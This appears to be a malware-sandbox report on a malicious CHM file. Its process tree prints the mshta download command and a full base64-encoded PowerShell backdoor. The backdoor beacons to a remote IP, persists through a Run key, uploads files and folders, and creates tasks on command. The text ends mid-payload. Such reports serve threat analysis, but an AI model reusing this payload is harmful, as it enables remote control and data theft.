Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6401	Aug. 16, 2023, 3:04 p.m.	Aug. 16, 2023, 3:06 p.m.

Size	10.6KB
Type	MS Windows HtmlHelp Data
MD5	`b5f9cd67cb32f44c138c382e17b06fd6`
SHA256	`78bdd68aed31a4f357b8da35c1d58cb0f9af89a02a526d12726928bca59360eb`
CRC32	`28252D65`
ssdeep	`96:6/zHS490SnAFqtnC+GbzKfi6tjOHDjMXv:6T/9Du0m/mi6tjqcf`
Yara	chm_file_format - chm file format

cmd.exe "C:\Windows\System32\cmd.exe" /c start /wait "IZFDLWw" C:\Users\test22\AppData\Local\Temp\password.chm
2560
- hh.exe "C:\Windows\hh.exe" C:\Users\test22\AppData\Local\Temp\password.chm
  2672
  - mshta.exe "C:\Windows\System32\mshta.exe" http://bian0151.cafe24.com/member/1.html
    2884
    - powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -ep bypass -ec UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAAOAA1ADsAJABPAGsAUwBEAEwAbABXAGMAVgBmAG4AcQBvAG8AIAA9ACAAMQAwADIANAAgACoAIAAxADAAMgA0ADsAJABvAHUAawBjAHYAVQBGAFAAaAAgAD0AIAAkAGUAbgB2ADoAQwBPAE0AUABVAFQARQBSAE4AQQBNAEUAIAArACAAJwAtACcAIAArACAAJABlAG4AdgA6AFUAUwBFAFIATgBBAE0ARQA7ACQAWgBaAFMAWgBkAGIAdQBOAFIATwB1ACAAPQAgACcAaAB0AHQAcAA6AC8ALwA3ADUALgAxADEAOQAuADEAMwA2AC4AMgAwADcALwBjAG8AbgBmAGkAZwAvAGIAYQBzAGUAcwAvAGMAbwBuAGYAaQBnAC4AcABoAHAAJwAgACsAIAAnAD8AVQA9ACcAIAArACAAJABvAHUAawBjAHYAVQBGAFAAaAA7ACQAeQB5AFUAIAA9ACAAJABlAG4AdgA6AFQARQBNAFAAIAArACAAJwBcAGcAWQBOAEMAcQBDAFEAJwA7AGkAZgAgACgAIQAoAFQAZQBzAHQALQBQAGEAdABoACAAJAB5AHkAVQApACkAIAB7AE4AZQB3AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAFAAYQB0AGgAIABIAEsAQwBVADoAXABTAG8AZgB0AHcAYQByAGUAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABDAHUAcgByAGUAbgB0AFYAZQByAHMAaQBvAG4AXABSAHUAbgAgAC0ATgBhAG0AZQAgAG0ATwBUAEMASwBkACAALQBWAGEAbAB1AGUAIAAnAGMAOgBcAHcAaQBuAGQAbwB3AHMAXABzAHkAcwB0AGUAbQAzADIAXABjAG0AZAAuAGUAeABlACAALwBjACAAUABvAHcAZQByAFMAaABlAGwAbAAuAGUAeABlACAALQBXAGkAbgBkAG8AdwBTAHQAeQBsAGUAIABoAGkAZABkAGUAbgAgAC0ATgBvAEwAbwBnAG8AIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0AZQBwACAAYgB5AHAAYQBzAHMAIABwAGkAbgBnACAALQBuACAAMQAgAC0AdwAgADUANgAzADkANAAyACAAMgAuADIALgAyAC4AMgAgAHwAfAAgAG0AcwBoAHQAYQAgAGgAdAB0AHAAOgAvAC8ANwA1AC4AMQAxADkALgAxADMANgAuADIAMAA3AC8AYwBvAG4AZgBpAGcALwBiAGEAcwBlAHMALwAxAC4AaAB0AG0AbAAnACAALQBQAHIAbwBwAGUAcgB0AHkAVAB5AHAAZQAgAFMAdAByAGkAbgBnACAALQBGAG8AcgBjAGUAOwB9AGYAdQBuAGMAdABpAG8AbgAgAFUAbABVAG0ATAAoACQAQwBzAEQAdAAsACAAJABXAFoAaABsAHYAbQBJAGQAbgApAHsAJABDAGYAcwBXAEkARQBuAE8ASQByACAAPQAgAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAkAFcAWgBoAGwAdgBtAEkAZABuACkAOwBbAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBIAHQAdABwAFcAZQBiAFIAZQBxAHUAZQBzAHQAXQAgACQAbgBGAFoAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAUgBlAHEAdQBlAHMAdABdADoAOgBDAHIAZQBhAHQAZQAoACQAQwBzAEQAdAApADsAJABuAEYAWgAuAE0AZQB0AGgAbwBkACAAPQAgACcAUABPAFMAVAAnADsAJABuAEYAWgAuAEMAbwBuAHQAZQBuAHQAVAB5AHAAZQAgAD0AIAAnAGEAcABwAGwAaQBjAGEAdABpAG8AbgAvAHgALQB3AHcAdwAtAGYAbwByAG0ALQB1AHIAbABlAG4AYwBvAGQAZQBkACcAOwAkAG4ARgBaAC4AQwBvAG4AdABlAG4AdABMAGUAbgBnAHQAaAAgAD0AIAAkAEMAZgBzAFcASQBFAG4ATwBJAHIALgBMAGUAbgBnAHQAaAA7ACQAeQB5AFUAVQAgAD0AIAAkAG4ARgBaAC4ARwBlAHQAUgBlAHEAdQBlAHMAdABTAHQAcgBlAGEAbQAoACkAOwAkAHkAeQBVAFUALgBXAHIAaQB0AGUAKAAkAEMAZgBzAFcASQBFAG4ATwBJAHIALAAgADAALAAgACQAQwBmAHMAVwBJAEUAbgBPAEkAcgAuAEwAZQBuAGcAdABoACkAOwAkAHkAeQBVAFUALgBGAGwAdQBzAGgAKAApADsAJAB5AHkAVQBVAC4AQwBsAG8AcwBlACgAKQA7AFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAEgAdAB0AHAAVwBlAGIAUgBlAHMAcABvAG4AcwBlAF0AIAAkAEkATgBmAHEAZwAgAD0AIAAkAG4ARgBaAC4ARwBlAHQAUgBlAHMAcABvAG4AcwBlACgAKQA7ACQAUwBnAHUAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ASQBPAC4AUwB0AHIAZQBhAG0AUgBlAGEAZABlAHIAKAAkAEkATgBmAHEAZwAuAEcAZQB0AFIAZQBzAHAAbwBuAHMAZQBTAHQAcgBlAGEAbQAoACkAKQA7ACQAeQB5AFUAVQBMAFQAIAA9ACAAJABTAGcAdQAuAFIAZQBhAGQAVABvAEUAbgBkACgAKQA7AHIAZQB0AHUAcgBuACAAJAB5AHkAVQBVAEwAVAA7AH0AZgB1AG4AYwB0AGkAbwBuACAAQgBhAGkAVQBIAFUAUQBiAHoAUQBKAEEAcwAoACQAQwBzAEQAdAAsACAAJABmAHIAUgBZAG0AdwBiAHcALAAgACQAeABkAEgASwBEAHYARgBNACwAIAAkAEMATgBHAG4AdwBXACkAewAkAFQAaQBtAGUAbwB1AHQAPQAxADAAMAAwADAAMAAwADAAOwAkAEMAUgBMAEYAIAA9ACAAWwBzAHQAcgBpAG4AZwBdACQAKABbAGMAaABhAHIAXQAwAHgAMABEACkAIAArACAAWwBzAHQAcgBpAG4AZwBdACQAKABbAGMAaABhAHIAXQAwAHgAMABBACkAOwAkAFQAdwBvAEgAeQBwAGgAZQBuAHMAIAA9ACAAJwAtAC0AJwA7ACQAQgBvAHUAbgBkAGEAcgB5ACAAPQAgACcAKgAqACoAKgAqACcAOwAkAHMAdAByAGUAYQBtACAAPQAgAFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AE8AcABlAG4AUgBlAGEAZAAoACQAZgByAFIAWQBtAHcAYgB3ACkAOwAkAGcAQgBGAHYAUABnAGIAWgAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAYgB5AHQAZQBbAF0AIAAkAE8AawBTAEQATABsAFcAYwBWAGYAbgBxAG8AbwA7AHcAaABpAGwAZQAoACAAJABiAHkAdABlAHMAUgBlAGEAZAAgAD0AIAAkAHMAdAByAGUAYQBtAC4AUgBlAGEAZAAoACQAZwBCAEYAdgBQAGcAYgBaACwAMAAsACQATwBrAFMARABMAGwAVwBjAFYAZgBuAHEAbwBvACkAKQB7AFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAEgAdAB0AHAAVwBlAGIAUgBlAHEAdQBlAHMAdABdACAAJABuAEYAWgAgAD0AIABbAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBSAGUAcQB1AGUAcwB0AF0AOgA6AEMAcgBlAGEAdABlACgAJABDAHMARAB0ACkAOwAkAG4ARgBaAC4ATQBlAHQAaABvAGQAIAA9ACAAJwBQAE8AUwBUACcAOwAkAG4ARgBaAC4AVABpAG0AZQBvAHUAdAAgAD0AIAAkAFQAaQBtAGUAbwB1AHQAOwAkAG4ARgBaAC4AQwBvAG4AdABlAG4AdABUAHkAcABlACAAPQAgACcAbQB1AGwAdABpAHAAYQByAHQALwBmAG8AcgBtAC0AZABhAHQAYQA7AGIAbwB1AG4AZABhAHIAeQA9ACcAIAArACAAJABCAG8AdQBuAGQAYQByAHkAOwAkAHkAeQBVAFUAIAA9ACAAJABuAEYAWgAuAEcAZQB0AFIAZQBxAHUAZQBzAHQAUwB0AHIAZQBhAG0AKAApADsAJABoAGUAYQBkAGkAbgBnADEAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AEIAeQB0AGUAcwAoACQAVAB3AG8ASAB5AHAAaABlAG4AcwAgACsAIAAkAEIAbwB1AG4AZABhAHIAeQAgACsAIAAkAEMAUgBMAEYAKQA7ACQAeQB5AFUAVQAuAFcAcgBpAHQAZQAoACQAaABlAGEAZABpAG4AZwAxACwAIAAwACwAIAAkAGgAZQBhAGQAaQBuAGcAMQAuAEwAZQBuAGcAdABoACkAOwAkAGgAZQBhAGQAaQBuAGcAMgAgAD0AIABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAQgB5AHQAZQBzACgAJwBDAG8AbgB0AGUAbgB0AC0ARABpAHMAcABvAHMAaQB0AGkAbwBuADoAIABmAG8AcgBtAC0AZABhAHQAYQA7ACAAbgBhAG0AZQA9ACcAIAArACAAWwBzAHQAcgBpAG4AZwBdACQAKABbAGMAaABhAHIAXQAwAHgAMgAyACkAIAArACAAJAB4AGQASABLAEQAdgBGAE0AIAArACAAWwBzAHQAcgBpAG4AZwBdACQAKABbAGMAaABhAHIAXQAwAHgAMgAyACkAIAArACAAJwA7AGYAaQBsAGUAbgBhAG0AZQA9ACcAIAArACAAWwBzAHQAcgBpAG4AZwBdACQAKABbAGMAaABhAHIAXQAwAHgAMgAyACkAIAArACAAJABDAE4ARwBuAHcAVwAgACsAIABbAHMAdAByAGkAbgBnAF0AJAAoAFsAYwBoAGEAcgBdADAAeAAyADIAKQAgACsAIAAkAEMAUgBMAEYAKQA7ACQAeQB5AFUAVQAuAFcAcgBpAHQAZQAoACQAaABlAGEAZABpAG4AZwAyACwAIAAwACwAIAAkAGgAZQBhAGQAaQBuAGcAMgAuAEwAZQBuAGcAdABoACkAOwAkAGgAZQBhAGQAaQBuAGcAMwAgAD0AIABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAQgB5AHQAZQBzACgAJABDAFIATABGACkAOwAkAHkAeQBVAFUALgBXAHIAaQB0AGUAKAAkAGgAZQBhAGQAaQBuAGcAMwAsACAAMAAsACAAJABoAGUAYQBkAGkAbgBnADMALgBMAGUAbgBnAHQAaAApADsAJAB5AHkAVQBVAC4AVwByAGkAdABlACgAJABnAEIARgB2AFAAZwBiAFoALAAgADAALAAgACQAYgB5AHQAZQBzAFIAZQBhAGQAKQA7ACQAeQB5AFUAVQAuAFcAcgBpAHQAZQAoACQAaABlAGEAZABpAG4AZwAzACwAIAAwACwAIAAkAGgAZQBhAGQAaQBuAGcAMwAuAEwAZQBuAGcAdABoACkAOwAkAGgAZQBhAGQAaQBuAGcANAAgAD0AIABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAQgB5AHQAZQBzACgAJABUAHcAbwBIAHkAcABoAGUAbgBzACAAKwAgACQAQgBvAHUAbgBkAGEAcgB5ACAAKwAgACQAVAB3AG8ASAB5AHAAaABlAG4AcwAgACsAIAAkAEMAUgBMAEYAKQA7ACQAeQB5AFUAVQAuAFcAcgBpAHQAZQAoACQAaABlAGEAZABpAG4AZwA0ACwAIAAwACwAIAAkAGgAZQBhAGQAaQBuAGcANAAuAEwAZQBuAGcAdABoACkAOwAkAHkAeQBVAFUALgBGAGwAdQBzAGgAKAApADsAJAB5AHkAVQBVAC4AQwBsAG8AcwBlACgAKQA7AFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAEgAdAB0AHAAVwBlAGIAUgBlAHMAcABvAG4AcwBlAF0AIAAkAEkATgBmAHEAZwAgAD0AIAAkAG4ARgBaAC4ARwBlAHQAUgBlAHMAcABvAG4AcwBlACgAKQA7ACQAUwBnAHUAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ASQBPAC4AUwB0AHIAZQBhAG0AUgBlAGEAZABlAHIAKAAkAEkATgBmAHEAZwAuAEcAZQB0AFIAZQBzAHAAbwBuAHMAZQBTAHQAcgBlAGEAbQAoACkAKQA7ACQAeQB5AFUAVQBMAFQAIAA9ACAAJABTAGcAdQAuAFIAZQBhAGQAVABvAEUAbgBkACgAKQA7AH0AJABzAHQAcgBlAGEAbQAuAEMAbABvAHMAZQAoACkAOwB9AGYAdQBuAGMAdABpAG8AbgAgAHcAWQBsAGIAZABoAFUARgBEAGwAcgAoACQAQwBzAEQAdAAsACAAJABmAHIAUgBZAG0AdwBiAHcAKQB7AFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAEgAdAB0AHAAVwBlAGIAUgBlAHEAdQBlAHMAdABdACAAJABSAGUAcQB1AGUAcwB0ACAAPQAgAFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAFIAZQBxAHUAZQBzAHQAXQA6ADoAQwByAGUAYQB0AGUAKAAkAEMAcwBEAHQAKQA7ACQAUgBlAHEAdQBlAHMAdAAuAHMAZQB0AF8AVABpAG0AZQBvAHUAdAAoADEANQAwADAAMAApADsAJABSAGUAcwBwAG8AbgBzAGUAIAA9ACAAJABSAGUAcQB1AGUAcwB0AC4ARwBlAHQAUgBlAHMAcABvAG4AcwBlACgAKQA7ACQAUgBlAHMAcABvAG4AcwBlAFMAdAByAGUAYQBtACAAPQAgACQAUgBlAHMAcABvAG4AcwBlAC4ARwBlAHQAUgBlAHMAcABvAG4AcwBlAFMAdAByAGUAYQBtACgAKQA7ACQAUwBwAGwAaQB0AFMAaQB6AGUAIAA9ACAAMQAwADIANAA7ACQAQgB1AGYAZgBlAHIAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAC0AVAB5AHAAZQBOAGEAbQBlACAAQgB5AHQAZQBbAF0AIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAJABTAHAAbABpAHQAUwBpAHoAZQA7AFQAcgB5ACAAewBEAG8AIAB7ACQAQwBvAHUAbgB0ACAAPQAgACQAUgBlAHMAcABvAG4AcwBlAFMAdAByAGUAYQBtAC4AUgBlAGEAZAAoACQAQgB1AGYAZgBlAHIALAAgADAALAAgACQAUwBwAGwAaQB0AFMAaQB6AGUAKQA7ACQAbwBmAGYAcwBlAHQAIAA9ACAAJABDAG8AdQBuAHQAIAAtACAAMQA7AEEAZABkAC0AQwBvAG4AdABlAG4AdAAgACQAZgByAFIAWQBtAHcAYgB3ACAAJABCAHUAZgBmAGUAcgBbADAALgAuACQAbwBmAGYAcwBlAHQAXQAgAC0ARQBuAGMAbwBkAGkAbgBnACAAQgB5AHQAZQA7AH0AIABVAG4AdABpAGwAKAAkAEMAbwB1AG4AdAAgAC0AZQBxACAAMAApAH0AIABDAGEAdABjAGgAIAB7AH0AIABGAGkAbgBhAGwAbAB5ACAAewAkAFIAZQBzAHAAbwBuAHMAZQBTAHQAcgBlAGEAbQAuAEQAaQBzAHAAbwBzAGUAKAApADsAfQB9AGQAbwB7AFQAcgB5AHsAJABKAE4AZgAgAD0AIABVAGwAVQBtAEwAIAAkAFoAWgBTAFoAZABiAHUATgBSAE8AdQAgACcAJwA7AEkAZgAgACgAJABKAE4AZgAgAC0AbgBlACAAJwBuAHUAbABsACcAIAAtAGEAbgBkACAAJABKAE4AZgAgAC0AbgBlACAAJwAnACkAewAkAEoATgBmAD0AJABKAE4AZgAuAFMAdQBiAFMAdAByAGkAbgBnACgAMQAsACAAJABKAE4AZgAuAEwAZQBuAGcAdABoACAALQAgADIAKQA7ACQARQB1AHgAZgBQAHIAdgB2AHoARgB1AFYAQgAgAD0AIABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABKAE4AZgApACkAOwBpAGYAIAAoACQARQB1AHgAZgBQAHIAdgB2AHoARgB1AFYAQgApAHsAaQBmACAAKAAkAEUAdQB4AGYAUAByAHYAdgB6AEYAdQBWAEIALgBDAG8AbgB0AGEAaQBuAHMAKAAnAGYAaQBsAGUAaQBuAGYAbwA6ACcAKQApAHsAJABRAEIAaQBhAD0AJABFAHUAeABmAFAAcgB2AHYAegBGAHUAVgBCAC4AUwB1AGIAUwB0AHIAaQBuAGcAKAA5ACkAOwBpAGYAIAAoAFQAZQBzAHQALQBQAGEAdABoACAALQBQAGEAdABoACAAJABRAEIAaQBhACkAewAkAGYAaQBsAGUAbgBhAG0AZQAgAD0AIAAkAHkAeQBVACAAKwAgACcALgBjAHMAdgAnADsARwBlAHQALQBDAGgAaQBsAGQASQB0AGUAbQAgACQAUQBCAGkAYQAgAC0ARgBpAGwAdABlAHIAIAAqAC4AKgAgAC0AUgBlAGMAdQByAHMAZQAgAHwAIABTAGUAbABlAGMAdAAtAE8AYgBqAGUAYwB0ACAATgBhAG0AZQAsACAATABlAG4AZwB0AGgALAAgAEwAYQBzAHQAVwByAGkAdABlAFQAaQBtAGUALAAgAEYAdQBsAGwAbgBhAG0AZQAgAHwAIABFAHgAcABvAHIAdAAtAEMAcwB2ACAALQBQAGEAdABoACAAJABmAGkAbABlAG4AYQBtAGUAIAAtAEYAbwByAGMAZQAgAC0ATgBvAFQAeQBwAGUASQBuAGYAbwByAG0AYQB0AGkAbwBuACAALQBFAG4AYwBvAGQAaQBuAGcAIAB1AHQAZgA4ADsAJABhAHQAdABhAGMAaABtAGUAbgB0AF8AbgBhAG0AZQAgAD0AIAAnAF8AZgBpAGwAZQAnADsAJABuAG8AdwB0AGkAbQBlACAAPQAgAEcAZQB0AC0ARABhAHQAZQAgAC0ARgBvAHIAbQBhAHQAIAB5AHkAeQB5AC0ATQBNAC0AZABkAF8ASABIAF8AbQBtAF8AcwBzADsAJABhAHQAdABhAGMAaABtAGUAbgB0AF8AZgBpAGwAZQBuAGEAbQBlACAAPQAgACQAbgBvAHcAdABpAG0AZQAgACsAIAAnAF8AZgBpAGwAZQBpAG4AZgBvACcAOwBCAGEAaQBVAEgAVQBRAGIAegBRAEoAQQBzACAAJABaAFoAUwBaAGQAYgB1AE4AUgBPAHUAIAAkAGYAaQBsAGUAbgBhAG0AZQAgACQAYQB0AHQAYQBjAGgAbQBlAG4AdABfAG4AYQBtAGUAIAAkAGEAdAB0AGEAYwBoAG0AZQBuAHQAXwBmAGkAbABlAG4AYQBtAGUAOwBSAGUAbQBvAHYAZQAtAEkAdABlAG0AIAAtAFAAYQB0AGgAIAAkAGYAaQBsAGUAbgBhAG0AZQA7AH0AfQBpAGYAIAAoACQARQB1AHgAZgBQAHIAdgB2AHoARgB1AFYAQgAuAEMAbwBuAHQAYQBpAG4AcwAoACcAZABpAHIAOgAnACkAKQB7ACQAUQBCAGkAYQA9ACQARQB1AHgAZgBQAHIAdgB2AHoARgB1AFYAQgAuAFMAdQBiAFMAdAByAGkAbgBnACgANAApADsAaQBmACAAKABUAGUAcwB0AC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAUQBCAGkAYQApAHsAJABmAGkAbABlAG4AYQBtAGUAIAA9ACAAJAB5AHkAVQAgACsAIAAnAC4AegBpAHAAJwA7AEMAbwBtAHAAcgBlAHMAcwAtAEEAcgBjAGgAaQB2AGUAIAAkAFEAQgBpAGEAIAAkAGYAaQBsAGUAbgBhAG0AZQAgAC0ARgBvAHIAYwBlADsAJABhAHQAdABhAGMAaABtAGUAbgB0AF8AbgBhAG0AZQAgAD0AIAAnAF8AZgBpAGwAZQAnADsAJABuAG8AdwB0AGkAbQBlACAAPQAgAEcAZQB0AC0ARABhAHQAZQAgAC0ARgBvAHIAbQBhAHQAIAB5AHkAeQB5AC0ATQBNAC0AZABkAF8ASABIAF8AbQBtAF8AcwBzADsAJABhAHQAdABhAGMAaABtAGUAbgB0AF8AZgBpAGwAZQBuAGEAbQBlACAAPQAgACQAbgBvAHcAdABpAG0AZQAgACsAIAAnAF8AZABpAHIAJwA7AEIAYQBpAFUASABVAFEAYgB6AFEASgBBAHMAIAAkAFoAWgBTAFoAZABiAHUATgBSAE8AdQAgACQAZgBpAGwAZQBuAGEAbQBlACAAJABhAHQAdABhAGMAaABtAGUAbgB0AF8AbgBhAG0AZQAgACQAYQB0AHQAYQBjAGgAbQBlAG4AdABfAGYAaQBsAGUAbgBhAG0AZQA7AFIAZQBtAG8AdgBlAC0ASQB0AGUAbQAgAC0AUABhAHQAaAAgACQAZgBpAGwAZQBuAGEAbQBlADsAfQB9AGkAZgAgACgAJABFAHUAeABmAFAAcgB2AHYAegBGAHUAVgBCAC4AQwBvAG4AdABhAGkAbgBzACgAJwBmAGkAbABlADoAJwApACkAewAkAFEAQgBpAGEAPQAkAEUAdQB4AGYAUAByAHYAdgB6AEYAdQBWAEIALgBTAHUAYgBTAHQAcgBpAG4AZwAoADUAKQA7AGkAZgAgACgAVABlAHMAdAAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAFEAQgBpAGEAKQB7ACQAYQB0AHQAYQBjAGgAbQBlAG4AdABfAG4AYQBtAGUAIAA9ACAAJwBfAGYAaQBsAGUAJwA7ACQAbgBvAHcAdABpAG0AZQAgAD0AIABHAGUAdAAtAEQAYQB0AGUAIAAtAEYAbwByAG0AYQB0ACAAeQB5AHkAeQAtAE0ATQAtAGQAZABfAEgASABfAG0AbQBfAHMAcwA7ACQAYQB0AHQAYQBjAGgAbQBlAG4AdABfAGYAaQBsAGUAbgBhAG0AZQAgAD0AIAAkAG4AbwB3AHQAaQBtAGUAIAArACAAJwBfAGYAaQBsAGUAJwA7AEIAYQBpAFUASABVAFEAYgB6AFEASgBBAHMAIAAkAFoAWgBTAFoAZABiAHUATgBSAE8AdQAgACQAUQBCAGkAYQAgACQAYQB0AHQAYQBjAGgAbQBlAG4AdABfAG4AYQBtAGUAIAAkAGEAdAB0AGEAYwBoAG0AZQBuAHQAXwBmAGkAbABlAG4AYQBtAGUAOwB9AH0AaQBmACAAKAAkAEUAdQB4AGYAUAByAHYAdgB6AEYAdQBWAEIALgBDAG8AbgB0AGEAaQBuAHMAKAAnAGQAbwB3AG4AOgAnACkAKQB7ACQAUQBCAGkAYQA9ACQARQB1AHgAZgBQAHIAdgB2AHoARgB1AFYAQgAuAFMAdQBiAFMAdAByAGkAbgBnACgANQApADsAJABDAGgAYQByAEEAcgByAGEAeQAgAD0AJABRAEIAaQBhAC4AUwBwAGwAaQB0ACgAJwB8AHwAJwApADsAaQBmACAAKAAkAEMAaABhAHIAQQByAHIAYQB5AC4ATABlAG4AZwB0AGgAIAAtAGUAcQAgADMAKQB7AHcAWQBsAGIAZABoAFUARgBEAGwAcgAgACQAQwBoAGEAcgBBAHIAcgBhAHkAWwAwAF0AIAAkAEMAaABhAHIAQQByAHIAYQB5AFsAMgBdADsAJABYAFQAbABsACAAPQAgACcAUgA9ACcAIAArACAAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoAVABvAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AEIAeQB0AGUAcwAoACcAbwBrACcAKQApADsAVQBsAFUAbQBMACAAJABaAFoAUwBaAGQAYgB1AE4AUgBPAHUAIAAkAFgAVABsAGwAOwB9AH0AaQBmACAAKAAkAEUAdQB4AGYAUAByAHYAdgB6AEYAdQBWAEIALgBDAG8AbgB0AGEAaQBuAHMAKAAnAHIAZQBnAGUAZABpAHQAOgAnACkAKQB7ACQAUQBCAGkAYQA9ACQARQB1AHgAZgBQAHIAdgB2AHoARgB1AFYAQgAuAFMAdQBiAFMAdAByAGkAbgBnACgAOAApADsAJABDAGgAYQByAEEAcgByAGEAeQAgAD0AJABRAEIAaQBhAC4AUwBwAGwAaQB0ACgAJwB8AHwAJwApADsAaQBmACAAKAAkAEMAaABhAHIAQQByAHIAYQB5AC4ATABlAG4AZwB0AGgAIAAtAGUAcQAgADUAKQB7AE4AZQB3AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAFAAYQB0AGgAIAAkAEMAaABhAHIAQQByAHIAYQB5AFsAMABdACAALQBOAGEAbQBlACAAJABDAGgAYQByAEEAcgByAGEAeQBbADIAXQAgAC0AVgBhAGwAdQBlACAAJABDAGgAYQByAEEAcgByAGEAeQBbADQAXQAgAC0AUAByAG8AcABlAHIAdAB5AFQAeQBwAGUAIABTAHQAcgBpAG4AZwAgAC0ARgBvAHIAYwBlADsAJABYAFQAbABsACAAPQAgACcAUgA9ACcAIAArACAAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoAVABvAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AEIAeQB0AGUAcwAoACcAbwBrACcAKQApADsAVQBsAFUAbQBMACAAJABaAFoAUwBaAGQAYgB1AE4AUgBPAHUAIAAkAFgAVABsAGwAOwB9AH0AaQBmACAAKAAkAEUAdQB4AGYAUAByAHYAdgB6AEYAdQBWAEIALgBDAG8AbgB0AGEAaQBuAHMAKAAnAHQAYQBzAGsAOgAnACkAKQB7ACQAUQBCAGkAYQA9ACQARQB1AHgAZgBQAHIAdgB2AHoARgB1AFYAQgAuAFMAdQBiAFMAdAByAGkAbgBnACgANQApADsAJABDAGgAYQByAEEAcgByAGEAeQAgAD0AJABRAEIAaQBhAC4AUwBwAGwAaQB0ACgAJwB8AHwAJwApADsAaQBmACAAKAAkAEMAaABhAHIAQQByAHIAYQB5AC4ATABlAG4AZwB0AGgAIAAtAGUAcQAgADUAKQB7ACQAQQBjAHQAaQBvAG4AIAA9ACAATgBlAHcALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrAEEAYwB0AGkAbwBuACAALQBFAHgAZQBjAHUAdABlACAAJABDAGgAYQByAEEAcgByAGEAeQBbADQAXQA7ACQAUwBlAHQAdABpAG4AZwBzACAAPQAgAE4AZQB3AC0AUwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawBTAGUAdAB0AGkAbgBnAHMAUwBlAHQAOwAkAHQAcgBpAGcAZwBlAHIAIAA9ACAATgBlAHcALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrAFQAcgBpAGcAZwBlAHIAIAAtAE8AbgBjAGUAIAAtAEEAdAAgACgARwBlAHQALQBEAGEAdABlACkAIAAtAFIAZQBwAGUAdABpAHQAaQBvAG4ASQBuAHQAZQByAHYAYQBsACgATgBlAHcALQBUAGkAbQBlAFMAcABhAG4AIAAtAE0AaQBuAHUAdABlAHMAIAAxADAAKQA7ACQAVABhAHMAawAgAD0AIABOAGUAdwAtAFMAYwBoAGUAZAB1AGwAZQBkAFQAYQBzAGsAIAAtAEEAYwB0AGkAbwBuACAAJABBAGMAdABpAG8AbgAgAC0AVAByAGkAZwBnAGUAcgAgACQAVAByAGkAZwBnAGUAcgAgAC0AUwBlAHQAdABpAG4AZwBzACAAJABTAGUAdAB0AGkAbgBnAHMAOwBSAGUAZwBpAHMAdABlAHIALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrACAALQBUAGEAcwBrAE4AYQBtAGUAIAAkAEMAaABhAHIAQQByAHIAYQB5AFsAMgBdACAALQBUAGEAcwBrAFAAYQB0AGgAIAAkAEMAaABhAHIAQQByAHIAYQB5AFsAMABdACAALQBJAG4AcAB1AHQATwBiAGoAZQBjAHQAIAAkAFQAYQBzAGsAOwAkAFgAVABsAGwAIAA9ACAAJwBSAD0AJwAgACsAIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBUAG8AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAQgB5AHQA